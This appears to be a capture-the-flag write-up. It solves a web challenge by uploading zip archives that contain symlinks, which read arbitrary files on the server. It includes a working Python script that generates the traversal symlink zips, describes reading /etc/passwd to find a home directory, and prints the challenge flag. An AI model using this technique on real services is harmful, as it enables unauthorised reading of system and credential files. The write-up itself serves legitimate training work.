Instructions
Hey, my digital cat managed to get into my server and I can’t get him out.
The only thing running on the server is a website a colleague of mine made.
Can you find a way to use the website to check if my cat’s okay? He’ll likely be in the user’s home directory.
You’ll know he’s fine if you find a “flag.txt” file.
By helix (@helix_shift on discord)
Solution
I wrote a quick Python script to generate zip files with symlinks to a target file.
#!/usr/bin/env python3
import zipfile
from sys import argv
def zi(num):
zipInfo = zipfile.ZipInfo()
zipInfo.create_system = 3
zipInfo.external_attr = 2716663808
zipInfo.filename = f"/flag{num}"
return zipInfo
def pi(num, path):
x = ['..']*num
dots = '/'.join(x)
return dots + path
if len(argv) != 2:
print("usage: ./solve.py <path>")
exit(1)
target_fs_path = argv[1]
with zipfile.ZipFile('payload.zip', 'w') as zipf:
for n in range(0, 10):
zipInfo = zi(n)
path = pi(n, target_fs_path)
zipf.writestr(zipInfo, path)
The challenge indicates that the file will be in a home directory, but symlinks don’t follow ~/flag.txt or $HOME/flag.txt to the user’s home directory. So instead, I read /etc/passwd to figure out which user home directory we needed to target.
/home/copenhagen/flag.txt is the obvious target. Just generate another zip with a symlink to this path.
utflag{No_Observable_Cats_Were_Harmed}